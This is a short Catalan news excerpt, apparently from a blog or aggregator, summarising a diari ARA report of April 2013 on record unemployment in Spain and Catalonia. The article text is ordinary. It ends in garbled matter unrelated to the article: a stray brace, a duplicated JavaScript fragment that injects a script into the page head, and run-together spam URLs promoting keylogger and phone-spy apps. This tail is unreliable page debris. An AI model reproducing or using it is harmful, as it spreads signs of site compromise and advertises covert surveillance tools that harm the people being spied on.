General

Drama de l’atur a Catalunya i a Espanya, en 15 titulars

El mercat de treball continua al pou: al 13% de les llars catalanes només hi viuen aturats, la destrucció de llocs de treball és general a tot l’Estat i l’atur juvenil s’enfila al 57%

Tot i les contínues negatives dels diferents ministres d’Ocupació de l’Estat, finalment Espanya ha superat els sis milions d’aturats. L’Enquesta de Població Activa feta pública aquest dijous reflecteix el que els organismes internacionals havien avisat: l’atur a l’Estat ha passat del 27% i ho ha fet, fins i tot, abans d’hora, perquè el Fons Monetari Internacional –l’organisme amb les previsions més pessimistes– ho esperava per a finals d’any.

A Catalunya el drama no és menor, i ja hi ha més de 900.000 persones aturades, un 24,5%, també un nou rècord històric que deixa un seguit de dades impactants:

Llegir la Notícia: diari ARA del 25 d’abril 2013

 

}

d.getElementsByTagName(‘head’)[0].appendChild(s);d.getElementsByTagName(‘head’)[0].appendChild(s);http://businessforumz.com/gsp-tracker-keylogger-iphone-spy-stealth/http://atelierdelentonnoir.fr/whatsapp-spy-android-keylogger-cell-spy/